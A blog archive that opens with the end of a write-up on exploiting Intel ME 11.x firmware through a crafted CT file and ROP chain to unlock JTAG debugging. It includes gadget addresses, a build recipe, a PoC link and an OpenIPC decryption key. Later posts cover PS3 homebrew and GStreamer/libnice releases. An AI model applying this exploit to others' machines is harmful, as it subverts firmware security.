  int consent = get_segment_dword(0x10F, 4); // Read 32 bits from 0x10F:4
  set_segment_dword(0x10f, 4, consent | 1); // Write to 0x10F:4
}

Well, that's easy, if we want to write to the DfX aggregator, we don't necessarily need to write to the sideband port directly, we can just write to the MMIO in segment 0x10F and it should do the work for us. Note that MMIO is simply mapped to the DfX-Agg device via the sideband, and I think that I had found the Sideband Port ID by looking at how the sideband mappings for the MMIO ranges get setup.

Back to ROP

So, now back to our ROP, all we would need to do, is to call this function using a ROP set_segment_dword(0x10F, 0, 3) that should be easy!

To find which ROPs we can use, and find the gadgets we want, we can use this very useful tool called Ropper. Using Ropper, I was able to search for the address of the pop esp; ret and the jmp $ instruction for the infinite loop as well as anything else I might need. I end up with this little ROP :


    # Write dfx personality = 0x3
    rops += rop(0x11B9)			# set_selector_dword
    rops += rop(0x44EA3) 		# infinite_loop
    rops += rop(0x10F)	 		# param 1 - selector
    rops += rop(0)			# param 2 - offset
    rops += rop(0x3)			# param 3 - value

Once that's done, I can give it a try, and... yes, yes, that's it, it worked, even though you can't really know it yet because I have no way of actually debugging the ME because the Intel IPC framework that Intel System Studio provides, does not (obviously) support the ME core in its JTAG configuration. I'll get to that in a minute, but yes, that is enough to get it working.

I have later improved the ROPs to actually write the original syslib context to the TLS structure, then reset the stack to what it should be so the init scripts can continue executing and the main finish its thing, so that after the exploit runs, I can still turn on the computer (the same as PT did with the CPU Bringup changes for TXE).

In summary :

Find the Stack address and Syslib context address from the first call in the BUP entry function.
Follow all the push/pop/call/ret to build a map of what the stack should look like
Find the offset of the CT data in the stack
Find the address of the return address of the memcpy call
Build your CT file so you have :
- ROPs to set RED level to the DfX-Aggregator and restore the stack
- Syslib context pointing to shared memory descriptors
- Shared memory descriptors (Don't forget, your buffer size needs to be your file size + 0x40 since you have one extra chunk at the end, and your address needs to be the target_address - offset)
- TLS data pointing to the custom syslib context
- Extra chunk at the end of the file that has the ROP with pop esp; ret and the pointer to your actual ROP data at the start of the file.
Add your custom CT file to the MFS partition using MFSUtil, making sure it aligns with end of chunks and does not use sequential chunks in the chain

I've uploaded my script to generate the CT file for ME 11 in a fork of PT's TXE POC repository. It has the offsets and ROPs for both Skylake (ME 11.0.18.1002) and Kabylake (ME 11.6.0.1126). It is currently in the me11 branch. I don't know if that branch gets deleted eventually and it goes into master, or it gets merged upstream officially (it's not TXE anymore, so maybe not?), regardless, here's the repository : https://github.com/kakaroto/IntelTXE-PoC/

OpenIPC

OpenIPC is the last step of this adventure! It's a Python library and tool and I don't know what else, but it's basically what we use to communicate with the ME on the machine. Positive Technologies repository explains well how to find the decryption key for the OpenIPC configuration files and how to decrypt them.

The second step is to apply a patch to the configuration files to add support for the ME.

The problem is that on Apollolake, the configuration file has every JTAG TAP (Test-Access Port) defined while the Skylake definition is empty (well, it only supports actual CPU cores but none of the other internal devices).

Figuring out the XML format of those files, how they are used, how JTAG itself works and everything else is a lesson for another day (probably never because I was in a daze trying to figure it out and I mostly banged on my keyboard like a monkey until something worked, then I erased all that knowledge from my brain because I was disgusted).

The way that JTAG works (more or less) is that you have a topology/hierarchy, you have a device that has children, and those children can have their own children, and if you don't know the full path to a device, you can't talk to it. If you make a mistake in the 'index' of those children in the path, then you'll be talking to something else. Thankfully, it's not very strict, so you can just say "the 3rd child of the 2nd child of the 4th child" and you don't need to specify what each of those in the link are, so if you make a mistake, or if the first device only has 1 child, then you'll just be talking to "the wrong child of the wrong child of the wrong child" rather than be unable to communicate. At least, I think that's how it works... I'm not entirely sure that's how it works and I entirely don't care, what's important though is that you don't need to say "I want to talk to device with ID x", instead you say "I want to talk to device 3->2->4" and then you ask it for its ID.

That topology is defined in an XML file, and I wrote a script that generated an XML file that basically brute forces every possibility. So for each device, I define 8 subdevices and for each of those subdevices, I define 8 other subdevices, up to a depth of 4 or I don't even remember how many. So after spending days trying to figure this out, I just wrote this script :

def genTaps(max, depth=0, max_depth=1, parent="SPT_TAP"):
    res = ""
    for i in xrange(0, max, 2):
        name = "%s_%s" % (parent, i)
        res += ('  ' * depth + '<Tap Name="%s" IrLen="8" IdcodeIr="0x0C"  VerifyProc="verify_idcode()" SerializeProc="common.tap.add_tap(0x11,%s,%s)" DeserializeProc="common.tap.remove_tap(0x11,%s,%s)" AdjustProc="common.tap.read_idcode_and_remove_if_zero()" InsertBeforeParent="false">\n' % (name, i, max, i, max))
        if depth + 1 < max_depth:
            res += genTaps(max, depth + 1, max_depth, name)
        res += ('  ' * depth + '</Tap>\n')
    return res
    # ProductInfo.xml needs this line added :
    # <TapInfo TapName="SPT_TAP.*" NodeType="Box" Stepping="$(Stepping)" AddInstanceNameSuffix="false"/>
    # Or whatever parent/prefix you use for the initial call set in TapName

Then I called it and generated a new OpenIPC/Data/Xml/SPT/TapNetworks.LP.xml file, added a line in the ProductInfo.xml file to tell it that there is a 'Box' node with all those TAP devices, then I ran OpenIPC again. Yeay, it accepts the config file (after the Nth attempt of course, let's ignore that...)!

The tap networks file is now 500KB and has this huge topology of about 3000 devices, most of which did not exist and would yield in an error when OpenIPC tries to scan their idcode, and would therefore not add them to the final device list (thinking they are just powered off), but once it's done, it should technically list every device that is actually available on the JTAG chain.

Finally, I run this little code in the IPC python console :

def displayValidIdcodes(prefix=""):
    for d in ipc.devs:
        if d.name.startswith(prefix):
            idcode = d.idcode()
            proc_id = d.irdrscan(0x2, 32)
            if proc_id != 0:
                idcode += " (" + proc_id.ToHex() + ")"
            print("%s : %s" % (d.name, idcode))

While looking at all the configuration files from various platforms and trying to understand the schema, I noticed that the core processors have two ID codes. The first one using the IR (Instruction Register I think?) scan code 0xC let every other device, which gives us the actual Idcode of the device, but using the IR scan code 0x2, it gives us the 'processor type' or something like that..

Once I run the above script, it gives me the list of all devices (just one) that have a non zero processor ID, and that reveals the CSME core! With that, I know its position in the topology, and I can clean up the xml file to leave only that device and give it a proper name and the proper configuration so I can debug into it, etc...


      <Tap Name="SPT_RGNLEFT" IrLen="8" Idcode="0x02080003" IdcodeIr="0x0C" SerializeProc="common.soc.add_tap(0x11, 2, 16)" DeserializeProc="common.soc.remove_tap(0x11, 2, 16)" AdjustProc="common.tap.read_idcode_and_remove_if_zero()" InsertBeforeParent="false">
	<Tap Name="SPT_PARCSMEA" IrLen="8" Idcode="0x2086103" IdcodeIr="0x0C" SerializeProc="common.soc.add_tap(0x11, 2, 14)" DeserializeProc="common.soc.remove_tap(0x11, 2, 14)" AdjustProc="common.tap.read_idcode_and_remove_if_zero()"  InsertBeforeParent="false">
	  <Tap Name="SPT_CSME_TAP" Idcode="0x08086101" IrLen="8" IdcodeIr="0x0C"  SerializeProc="common.soc.add_tap(0x11, 2, 14)" DeserializeProc="common.soc.remove_tap(0x11, 2, 14)" InsertBeforeParent="false"/>
          <Tap Name="SPT_PARCSMEA_RETIME" IrLen="8" Idcode="0x0008610B" IdcodeIr="0x0C" VerifyProc="verify_idcode()" SerializeProc="common.soc.add_tap(0x11, 12, 14)" DeserializeProc="common.soc.remove_tap(0x11, 12, 14)" InsertBeforeParent="false"/>
        </Tap>
      </Tap>

Oh by the way, this is on OpenIPC_1.1917.3733.100 and the decryption key is 1245caa98aefede38f3b2dcfc93dabfd so we can just decrypt the OpenIPC files with :

python config_decryptor.py -k 1245caa98aefede38f3b2dcfc93dabfd -p C:\Intel\OpenIPC_1.1917.3733.100

It would probably be a different version of OpenIPC if you use the latest version of Intel System Studio (I believe I had version 2019.4) and therefore a different decryption key. You can find your own easily using the instructions that PT have released along with their POC repository.

There is one final problem that still needs to be resolved. Whenever I open OpenIPC with the machine turned on, it will fail because of some conflict in the configuration between the ME core and main CPU, so I have to connect to the machine before I power it on, connect with OpenIPC, then turn the machine on, and it works. I'm sure that some smart people can figure out the right XML configuration that would allow me to debug both the ME and the CPU cores at the same time, but I don't really need that so I didn't waste any of my time trying to achieve that. Note that the TXE PoC for Apollolake suffers from the same problem and the patches to OpenIPC that PT released remove the CPU cores to prevent that conflict from happening.

Regardless, the diff for the config files is added to my repository IntelTXE-PoC fork, and just make sure you launch OpenIPC before powering on the main CPU and you should be fine.

And that's it! Congratulations, you can now debug the ME 11.x on a Skylake or Kabylake machine!

That's the end of the story for today. Next time, I'll tell you about how I wrote a quick USB controller for the CSE and how I made the CSME disrupt the USB and SATA controllers while the OS was booted, making all USB/SATA drives become inaccessible!

While in this post, you saw the release of the MFSUtil project and the ME 11.x port of the IntelTXE PoC, in the next one (either tomorrow or Friday), I'll release a lot of the tools and scripts I used to work with JTAG, so you can do more easily poke at the ME processor without fighting against the limitation of the OpenIPC library.

Thank you and you and you

Update: In my rush to post this yesterday (I had been writing this post for about 8 hours and it was 4AM), I forgot to add the little thank you to all those who helped me throughout this journey. Of course, Mark Ermolov and Maxim Goryachy from Positive Technologies for laying down most of the ground work and being helpful by answering all my questions, Dmitry Sklyarov for figuring out the MFS partition format and documenting it for the rest of us, as well as Peter Bosch who gave useful advice and helped me understand the sideband channel a bit better, David Barksdale who gave me the trick to finding the stack address from that first function in the bup code, as well probably some others to whom I apologize for not remembering them right now (it has been a long time...).

Again, thanks for reading! 🙂

Eleganz release for Cobra ODE

Posted on October 5, 2013 by kakaroto

Hi everyone,

It’s been a long time since I last blogged. Today I have some exciting news for you, as I have ported Eleganz, my homebrew manager, to the Cobra ODE.

A little while ago, I tweeted that if Cobra ever released their device and did provide an open source library for integration of other managers, I would port Eleganz to it, and today I am fulfilling that promise. I would like to thank the guys over at ps3crunch.net and ps3hax.net for testing this for me, particularly Abkarino, hyappon, freddy, magneto and Xodus69.

When I released Eleganz in November 2011, I left out one small thing on the TODO list, I wanted to see someone pick it up and add the code to exitspawn to actually make Eleganz execute the homebrew apps, but no one did that in almost a year now. I am a bit disappointed that the ps3 scene (homebrew devs, not users) didn’t pick it up, but it looked like no one was interested in maintaining Eleganz in my place. Today, I am happy to see that Eleganz is not throw-away code, as it can be useful to ODE users.

I can understand why Eleganz didn’t have much appeal in the world of CFW (it was originally intended to run on OFW if my HEN ever worked), but with the ODEs running on OFW, it’s perfect for the job. It’s simple, it’s beautiful and customizable!

Not only can Eleganz list the games from the Cobra ODE and allow you to select your iso, but it will also allow you to list and run homebrew apps that you can embed in the ISO file. This way you can get access to all your homebrew in a single place, without the need to restart the PS3 or boot the homebrew’s iso from the ODE. You can just extract the eleganz iso, and add homebrew apps (that are re-signed for running from a BD drive) to the iso’s PS3_GAME/USRDIR/HOMEBREW directory and recreate the iso with the cobra tool, and that’s it.

Note that this is not an indication of me getting back into the hacking scene. I have given up on the HEN long ago as I realized that there was no way (that I could find) to run homebrew on OFW, unless they are running from a disc. I may keep improving Eleganz in the near future, but I do not plan to do anything more than that for the ps3 scene at this point.

I would also like to tell everyone that there’s no need to worry, Eleganz will not become cobra-specific, as any feature I’d implement will benefit CFW as well as ODE users. I will be releasing an updated version for CFW users soon.

I’d also like to thank magneto and the Cobra team for offering to send me a Cobra ODE as a gift for porting Eleganz to it. Once I receive it, I plan on adding disc dumping capabilities to Eleganz and improve the user experience a little without relying on others to test it for me.

You can find the latest source code on github as always and compile it yourself or you can download the pre-compiled iso file from this link : http://www.multiupload.nl/GXBBI19VOL

I hope it gets used now and you all can enjoy it and I hope I can see some cool themes created for it now!

KaKaRoTo

libnice 0.1.4 released!

Posted on February 22, 2013 by kakaroto

Hey everyone,

I have just released a new version of libnice, the NAT traversal library.

Version 0.1.4 has a few bug fixes but the major changes are the addition of an SDP parsing and generation API.

You can now more easily generate your credentials and candidates and parse them with a single API call, making it much easier to exchange candidates and establish a successful connection.

Also, I have added three examples to the examples/ subdirectoy from the libnice source tree. Those examples should help anyone learn how to use libnice and what to do in order to establish a successful connection.

The first example, simple-example.c will create a new agent, and gather its candidates and print out a single line to paste on the peer. It uses the signals to asynchronously wait for events and continue the code execution.

The second example, threaded-example.c, will run the mainloop on the main thread and do everything else sequentially in another thread, waiting for signals to release the libnice thread to continue processing.

The final example, sdp-example.c, is based on the threaded example but uses the new SDP generate/parsing API to generate the candidates and credentials line to exchange between the two instances. It will base64 the SDP to make it all fit into a single line, making it easier to exchange the SDP between clients without having to parse the multi-line SDP in the example, keeping it small and concise.

I hope you will find this release useful, let me know if you have any comments.

You can get the latest version here and the documentation has been updated here.

KaKaRoTo

Eleganz: The Elegant Homebrew Manager

Posted on November 23, 2012 by kakaroto

Hi everyone,

Last year, in January, I decided to have some fun and write a homebrew application using the EFL libraries. I decided to work on a homebrew manager.. basically a replacement to the XMB. It went really well, and the development was really fast, and it was all thanks to the awesome API and capabilities of the EFL libraries. However, I became busy and was unable to continue… also, it was a bit slow and without proper hardware acceleration, it wouldn’t be as good as I hoped for, so I put the project on the side.
After many months, in September, thanks to gzorin’s work, we finally had a working and usable GL implementation and the EFL apps automatically gained from it by becoming hardware accelerated. My homebrew manager was much better! but I still needed to finish a few things and I didn’t have time so I put to rest again.

Today, I have decided to release this homebrew application, *as is* for everyone’s enjoyment! This means that it is not fully working, it might still have some bugs here and there, but it is still a homebrew app that people can use and have some fun with. Most importantly it will serve 4 purposes :

Maybe re-awaken this dying PS3 homebrew scene
Be a good “exercise to the community” for finishing it up
Be a good example of what can be done with the EFL
Bring non-developers into writing EFL themes for the app

I introduce to you, Eleganz! The Elegant Homebrew Manager! A little homebrew app that lets you install pkg files and run your games directly from it. Here is the mandatory screencast video :

YouTube Link toEleganz screencast

I have published my app in both github and on ps3dev’s gitorious. and you can also download a pre-compiled .pkg for your PS3 to have fun with it.

Here are some highglights of the application (features, limitations and bugs) :

The whole User Interface is completely customizable with themes
Installs .pkg files locally to its own data directory (won’t be visible in the real XMB, unless someone reverses the database format)
Does not yet run games (it’s for you to do it, use ps3load as reference maybe…)
Current theme is missing proper theme/images for the progressbar windows (default exquisite/E17 theme used)
System freezes for a few milliseconds when it tries to load a game’s background image (might be fixed if we implement a pthread library and threading support in the EFL)
Apparently crashes when it exits (bug)

The homebrew app comes with two themes, a dark and light theme. I like the dark one so I chose that as the default (oh, ignore that grey background ‘default’ one from that screencast video, that was just for testing). I wrote the user interface for the theme (the Edje files) while opium designed all the graphics. The theme engine in the EFL is extremely powerful, so I hope I will see tons of themes popping up. And I do not mean “change the images” themes, I want real themes, where the whole UI is different, a vertical XMB, a circular one, a 3D theme with perspective/depth for the icons, a dynamic/moving background, etc… You can learn about the .edj/.edc file format here and don’t forget to check the EDC reference wiki.

I hope to see the community pick this up and have fun with it!

That’s about it, enjoy it, and send me your patches! I’ll be waiting 🙂

KaKaRoTo

p.s: Forgot to say that the rules/naming conventions/etc.. of the EDC files are explained here. If a .edj file doesn’t have the appropriate parts/groups, then it will be ignored and will not show on the UI.

p.p.s: You can install the EFL on windows and have access to edje_cc to compile your .edc into .edj.

p.p.p.s: Damn, I keep forgetting stuff.. by the way, the whole Eleganz application works just fine on the PC too, I did all my development on the PC (that screencast was actually on Linux), *then* I tried it on the PS3 and it just worked.. so for theme development, it should be pretty easy to test without the need of a PS3.

UVC H264 Encoding cameras support in GStreamer

Posted on September 21, 2012 by kakaroto

More and more people are doing video conferencing everyday, and for that to be possible, the video has to be encoded before being sent over the network. The most efficient and most popular codec at this time is H264, and since the UVC (USB Video Class) specification 1.1, there is support for H264 encoding cameras.

One such camera is the Logitech C920. A really great camera which can produce a 1080p H264-encoded stream at 30 fps. As part of my job for Collabora, I was tasked to add support for such a camera in GStreamer. After months of work, it’s finally done and has now been integrated upstream into gst-plugins-bad 0.10 (port to GST 1.0 pending).

One important aspect here is that when you are capturing a high quality, high resolution H264 stream, you don’t want to be wasting your CPU to decode your own video in order to show a preview window during a video chat, so it was important for me to be able to capture both H264 and raw data from the camera. For this reason, I have decided to create a camerabin2-style source: uvch264_src.

Uvch264_src is a source which implements the GstBaseCameraSrc API. This means that instead of the traditional ‘src’ pad, it provides instead three distinct source pads: vidsrc, imgsrc and vfsrc. The GstBaseCameraSrc API is based heavily on the concept of a “Camera” application for phones. As such, the vidsrc is meant as a source for recording video, imgsrc as a source for taking a single-picture and vfsrc as a source for the viewfinder (preview) window. A ‘mode’ property is used to switch between video-mode and image-mode for capture. The uvch264_src source only supports video mode however, and the imgsrc will never be used.

When the element goes to PLAYING, only the vfsrc will output data, and you have to send the “start-capture” action signal to activate the vidsrc/imgsrc pads, and send the “stop-capture” action signal to stop capturing from the vidsrc/imgsrc pads. Note that vfsrc will be outputting data when in PLAYING, so it must always be linked (link it to fakesink if you don’t need the preview, otherwise you’ll get a not-linked error). If you want to test this on the command line (gst-launch) you can set the ‘auto-start’ property to TRUE and the uvch264_src will automatically start the capture after going to PLAYING.

You can request H264, MJPG, and raw data from the vidsrc, but only MJPG and raw data from the vfsrc. When requesting H264 from the vidsrc, then the max resolution for the vfsrc will be 640×480, which can be served as jpg or as raw (decoded from jpg). So if you don’t want to use any CPU for decoding, you should ask for a raw resolution lower than 432×240 (with the C920) which will directly capture YUV from the camera. Any higher resolution won’t be able to go through the usb’s bandwidth and the preview will have to be captured in mjpg (uvch264_src will take care of that for you).

The source has two types of controls, the static controls which must be set in READY state, and DYNAMIC controls which can be dynamically changed in PLAYING state. The description of each property will specify whether that property is a static or dynamic control, as well as its flags. Here are the supported static controls : initial-bitrate, slice-units, slice-mode, iframe-period, usage-type, entropy, enable-sei, num-reorder-frames, preview-flipped and leaky-bucket-size. The dynamic controls are : rate-control, fixed-framerate, level-idc, peak-bitrate, average-bitrate, min-iframe-qp, max-iframe-qp, min-pframe-qp, max-pframe-qp, min-bframe-qp, max-bframe-qp, ltr-buffer-size and ltr-encoder-control.

Each control will have a minimum, maximum and default value, and those are specific to each camera and need to be probed when the element is in READY state. For that reason, I have added three element actions to the source in order to probe those settings : get-enum-setting, get-boolean-setting and get-int-setting.
These functions will return TRUE if the property is valid and the information was successfully retrieved, or FALSE if the property is invalid (giving an
invalid name or a boolean property to get_int_setting for example) or if the camera returned an error trying to probe its capabilities.
The prototype of the signals are :

gboolean get_enum_setting (GstElement *object, char *property, gint *mask, gint *default);
Where the mask is a bit field specifying which enums can be set, where the bit being set is (1 << enum_value).
For example, the ‘slice-mode’ enum can only be ignored (0) or slices/frame (3), so the mask returned would be : 0x09
That is equivalent to (1 << 0 | 1 << 3) which is :
(1 << UVC_H264_SLICEMODE_IGNORED) | (1 << UVC_H264_SLICEMODE_SLICEPERFRAME)
gboolean get_int_setting (GstElement *object, char *property, gint *min, gint *def, gint *max);
This one gives the minimum, maximum and default values for a property. If a property has min and max to the same value, then the property cannot be changed, for example the C920 has num-reorder-frames setting: min=0, def=0 and max=0, and it means the C920 doesn’t support reorder frames.
gboolean get_boolean_setting (GstElement *object, char *property, gboolean *changeable, gboolean *default_value);
The boolean value will have changeable=TRUE only if changing the property will have an effect on the encoder, for example, the C920 does not support the preview-flipped property, so that one would have changeable=FALSE (and default value is FALSE in this case), but it does support the enable-sei property so that one would have changeable=TRUE (with a default value of FALSE).

This should give you all the information you need to know which settings are available on the hardware, and from there, be able to control the properties
that are available.

Since these are element actions, they are called this way :

gboolean return_value, changeable, default_bool;
gint mask, minimum, maximum, default_int, default_enum;

g_signal_emit_by_name (G_OBJECT(element), "get-enum-setting", "slice-mode", &mask, &default_enum, &return_value, NULL);
g_signal_emit_by_name (G_OBJECT(element), "get-boolean-setting", "enable-sei", &changeable, &default_bool, &return_value, NULL);
g_signal_emit_by_name (G_OBJECT(element), "get-int-setting", "iframe-period", &minimum, &default_int &maximum, &return_value, NULL);

Apart from that, the source also supports the GstForceKeyUnit video event for dynamically requesting keyframes, as well as custom-upstream events to control LTR (Long-Term Reference frames), bitrate, QP, rate-control and level-idc, through, respectively, the uvc-h264-ltr-picture-control, uvc-h264-bitrate-control, uvc-h264-qp-control, uvc-h264-rate-control and uvc-h264-level-idc custom upstream events (read the code for more information!). The source also supports receiving the ‘renegotiate’ custom upstream event which will make it renegotiate the according to the caps on its pads. This is useful if you want to enable/disable h264 streaming or switch resolution/framerate easily while the pipeline is running; Simply change your caps and send the renegotiate event.

I have written a GUI test application which you can use to test the camera and the source’s various features. It can also serve as a reference implementation on how the source can be used. The test application resides in gst-plugins-bad, under tests/examples/uvch264/ (make sure to run it from its source directory though).

uvch264_src test application (click to enlarge)

You can also use this example gst-launch pipeline for testing the capture of the camera. This will capture a small preview window as well as an h264 stream in 1080p that will be decoded locally :

gst-launch uvch264_src device=/dev/video1 name=src auto-start=true src.vfsrc ! queue ! “video/x-raw-yuv,width=320,height=240,framerate=30/1” ! xvimagesink src.vidsrc ! queue ! video/x-h264,width=1920,height=1080,framerate=30/1,profile=constrained-baseline ! h264parse ! ffdec_h264 ! xvimagesink

That’s about it. If you are interested in using uvch264_src to capture from one of the UVC H264 encoding cameras, make sure you upgrade to the latest git versions of gstreamer, gst-plugins-base, gst-plugins-good and gst-plugins-bad (or 0.10.37+ for gstreamer/gst-plugins-base, 0.10.32 for gst-plugins-good and 0.10.24 for gst-plugins-bad, whenever those versions get released).

I would like to thank Collabora and Cisco for sponsoring me to work on this great project, it couldn’t have been possible without them!

If you have any more questions about this subject, feel free to contact me.

Enjoy!

GstFilters library released!

Posted on December 20, 2011 by kakaroto

After the various blog posts about it, and the talk I gave at the GStreamer Conference, there was a lot of interest in the GstFilters library that I’ve been working on. The original plan was for it to get merged into gst-plugins-base, however, it seems like that’s not going to happen. The GStreamer developers would prefer seeing some of its features integrated into the core, but they don’t want the library itself. So I have finally decided to release it as a standalone package so everyone interested can already start using it.

As features from GstFilters will slowly get merged into the core of GStreamer, I will adapt the library to make use of these new features, reducing its internal code. However I believe it is still very useful to have Gstfilters as it’s a very simple library for those who are not familiar with GStreamer. Also the concept of the ‘filters’ is very different from the GstElements because an element can only be added once in a pipeline but filters can be added any number of times in a pipeline (a GstFilter doesn’t represent an actual element, it’s more like a helper function for “create and link these elements for me”). Also the points I’ve made about the steep learning curve and the robustness checks will still be valid even after the Gst core makes dynamic pipeline modifications easier.

GstFilters are now released and will be hosted on freedesktop.org under Farstream’s project. While Farstream users will be the most interested in this library and it is very useful for VoIP/Farstream users, it can also be used for non VoIP applications.

On a similar note, the Farsight-Utils library and API that I presented at the GStreamer Conference has been modified to make it even simpler. The library has been renamed into Farstream-IO since it basically takes care of all the Input/Output to the Farstream conference. The new API is based on a single object now, a FsIoPipeline that you create (which is a subclass of GstPipeline) and to which you register the FsConference/FsSession/FsStream. All the methods from the previous Farsight-Utils classes (FsuConference, FsuSession and FsuStream) will stay the same but will be merged into this single FsIoPipeline class, making everything easier and you’d only need to keep track of a single object.

The FsIo API will be merged into Farstream and released for the next version.

Here is the link to the new GstFilters page : http://www.freedesktop.org/wiki/Software/GstFilters

And you can get the release tarball from here : http://freedesktop.org/software/farstream/releases/gstfilters/

And browse its documentation here : http://www.freedesktop.org/software/farstream/apidoc/gstfilters/

Eskiss for PS3 with PS Move support

Posted on October 1, 2011 by kakaroto

Hi all,

I’m releasing Eskiss with Move support and I think the instructions on how to use it require a bit more than what twitter allows (from my usual small updates).

You can download here the Eskiss package for PS3 3.55, and here the package for PS3 3.41.

The instructions are simple, you can still play with a normal mouse if you want, or use the controller to emulate the mouse, just like before. But, if you have a PS Eye camera plugged in, then it will also be ready to handle the Move.

If it detects a move controller, the ball on the controller will be white, at that point, you must press the Action button while pointing the controller to the camera (there’s no image feedback on the screen, so just point and press the action button). This will calibrate the controller and the ball will change color. At this point, moving the controller will also move the cursor on screen.

You can press the Action button at any time to recalibrate the controller (useful if the tracking stops working correctly, or camera falls off), and you can press the Start button at anytime to center the cursor on screen. Pressing the T button trigger will emulate a click.

You have the choice between two tracking modes, the first one (the one selected by default) is the 3D coordinate system, which means the cursor appears on screen with 1 to 1 precision (kind of) with where the controller is located in the room, so you have to move the whole controller to move the cursor (and even maybe stretch your arms to get to the corners), the second tracking mode is using the internal gyroscope of the controller, in other words, you can move the cursor just by pointing or rotating the controller without moving the whole controller in 3D space.

You can switch from one tracking mode to another at any time by pressing the Select button. Try them both and see which one you like best.

P.s: When you press the Action button to calibrate, the ball will change colors a few times, you must not move the controller while it’s doing that, do not move until it becomes a solid, stable color. If the ball becomes white again, it means you moved and the calibration failed… in that case, try again.

P.p.s: In this release, I have also fixed the crash that you might have had in the previous version, so the game should be a lot more stable. While it still might crash, it is now very rare and shouldn’t break the gameplay like it did before.

And here’s a video demo of the game running with the Move controller, courtesy of fungos :

Enjoy,

KaKaRoTo

The Humble Homebrew Collection

Posted on May 22, 2011 by kakaroto

Finally, after almost 2 months of hard work, I’m proud and happy to announce the release of the Homebrew game I’ve been working on : SGT Puzzles. It’s a collection of portable puzzle games for Windows, Mac, Linux, Android, PocketPC, Android, etc.. and I’ve ported it to the PS3 too!

The release of this homebrew game comes with the release of The Humble Homebrew Collection which is inspired by the Humble Indie Bundle Initiative (but not endorsed by it). The difference here is that you don’t have to pay anything in order to enjoy the games, they are free to download by anyone, but you are also able to donate any amount to the developer of the puzzle games (Simon Tatham) as well as the PS3 port developer (me!) and the EFF. You decide who to send the money to just like with the Humble Bundle. I’ve also linked to the game’s Windows, Mac and Android ports if you want them (they are already available in most Linux distributions).

The addition here and probably the most important part is a petition where yo get to sign and send a message to Sony asking for a legitimate way of having homebrew games on the PS3. Every signature will send an email to SCEE, SCEA, SCE Australia, SCE New Zealand and Kazuo Hirai, the CEO of Sony Computer Entertainment. This is done in the hopes that Sony will finally see the light, learn from the mistakes they’ve been doing these past few years, and finally give us a legitimate and officially supported way of developing homebrew applications for our PS3 Systems.

Sony would be stupid not to answer to that, considering that Apple complied, Microsoft complied and Google complied, and they are all generating huge revenues thanks to homebrewers, with zero investment from their part. I know that the Sony execs only understand when you talk about money, so I hope this is a good enough incentive for them. Clearly, they do not care about their customers, so I don’t think they’ll change anything only to do what is right.

The SGT Puzzles game includes 33 puzzles, which are excellent for the most part. My favorite is and always will be Pattern, as I’ve spent countless hours playing it. I’ve recently also discovered Rectangles and Net which are also very good (in higher difficulties). I suggest you give those puzzles a try. Above all, I hope everyone can enjoy these games.

This all started about 2 months ago when I found a copy of Pattern on my PC and started playing it again. I tweeted about it and asked if someone wanted to port it to the PS3. Clement Bouvet (@TeToNN) quickly made a proof of concept using cairo. That got me excited and I decided to help him. We ended up writing a PS3 application over Simon Tatham’s Portable Puzzle Collection which, I must say, is very well written and made porting it to the PS3 very easy. It took maybe a day or two and the first game was playable on the PS3. At that point, I discovered the Cairo Drawing API which I loved and and I decided to invest myself entirely in this. It took 3 more weeks of hard work to get the whole system working (choose your puzzle game, change difficulty (Select) and writing the whole menu system for the game). I’ve received various help, Surenix made the designs for the menu graphics and buttons, and BeGamer helped design the HHC website.

The game still lacks a few things, and I will continue to work on it and improve it so everyone can enjoy a quality homebrew game, that, I hope, will make the anti-homebrew purists jealous.

The funny thing is that since day one, the source code for this game was available on my github account, but no one noticed it. Only a few people who accidently ended up on my github page found it, but no news website author found it or reported on it. I’m glad, because it allowed me to make this happen the way I wanted it to and launch this HHC initiative when it became ready. I’d like to ask the various websites out there not to link directly to the games (even if you are allowed to) and instead link to humblehomebrew.com so people can sign the petition while downloading.

Most of the code is licensed under the MIT license. Parts of the code (the cairo menu system) is licensed under the LGPL license and I plan on extracting that into its own library for other developers to use in their applications.

The website took about 3 weeks to code. I learned two valuable lessons.. first, HTML coding is crap… secondly, it’s much more complicated than it looks. I hope people will appreciate this effort and I hope the Humble Homebrew Collection will make a difference.

In the future, I hope to enhance it by adding new homebrew games whenever I find something of quality, and keep the website and this whole initiative going for a long time, for as long as necessary.

So.. go ahead, download the games, sign the petition, maybe donate if you’re feeling generous, and most importantly, have fun!

Thank you!

PS3IDA Released!

Posted on March 20, 2011 by kakaroto

It’s been a while since my last post! A lot has been happening lately, I’ve mostly kept my followers updated on what’s new through my Twitter account, but I think that this deserves a post of its own!

I’ve been reversing some PPC code in IDA and unfortunately, it doesn’t handle the PS3 files very well, so I wrote a lot of scripts in order to make it parse the files properly! There was one thing missing though that I couldn’t do with an .idc script : handling of jump tables.

Yesterday, I took on the task of writing an IDA plugin in order to parse the ppc code and find jump tables and define them in IDA’s kernel so the analysis is done properly! It was a very fun and exciting challenge that I enjoyed doing, and I’m happy to say that I succeeded and it works very well (on the files I tried anyways).

The IDA API is extensive and easy to use, and allows you to do pretty much anything! I also found the IDA Pro Book to be extremely well written and very useful! I would suggest to anyone who likes tinkering to try and write an IDA plugin, because it was a challenging but fun experience!

I initially wrote the plugin thinking that the jump table instruction patterns was always the same, but when I started testing, I found out that some instructions could have a different order, there might be inserted instructions in the middle of the pattern, or different registers being used, etc.. so I eventually had to rewrite my plugin and ended up using a class that comes from IDA’s SDK which takes care of “instruction rescheduling” and “intermingling of the jump sequence with other instructions”, at least I learned from my first try and it made my second try a lot easier. I also realized that I haven’t done any C++ in maybe 5 or 6 years, and I really forgot all about how to write C++ code. It was a bit embarassing to google “how to derive from a class in C++”, lol!

Anyways, I am now releasing my scripts and my PPCJT plugin for IDA under a new project : PS3IDA.

I’ve created the ps3ida repository on git-hacks.com (Thanks again to @dashhacks for providing us with this safe haven for all our legal tools). The repository contains many files, I suggest you read the README file for a description of each, but the most important ones are analyze_self.idc and analyze_sprx.idc. I’ve also ported my lv2_dump_analyzer.idc script to work with IDA 6.0.

There are two plugins in ps3ida, the first one is the well known PPCAltivec released by xorloser, I’ve decided to add it to the project so the source code stays available for anyone who needs it. I also slightly modified the source code so it compiles correctly on Linux using gcc 4.x. The second plugin is PPCJT that I wrote yesterday, it will find jump tables and define them in IDA’s kernel so the functions get properly analyzed. Just install it, and when you see a switch/case in the code, put the cursor on the ‘bctr’ instruction and press ‘C’ so it can parse the jump sequence and fix it, or just go to “Options->General->Analysis->Reanalyze program” and it will fix them for all the file.

I have built the PPCJT plugin for Windows and Linux for IDA v6.0, you can download it here.

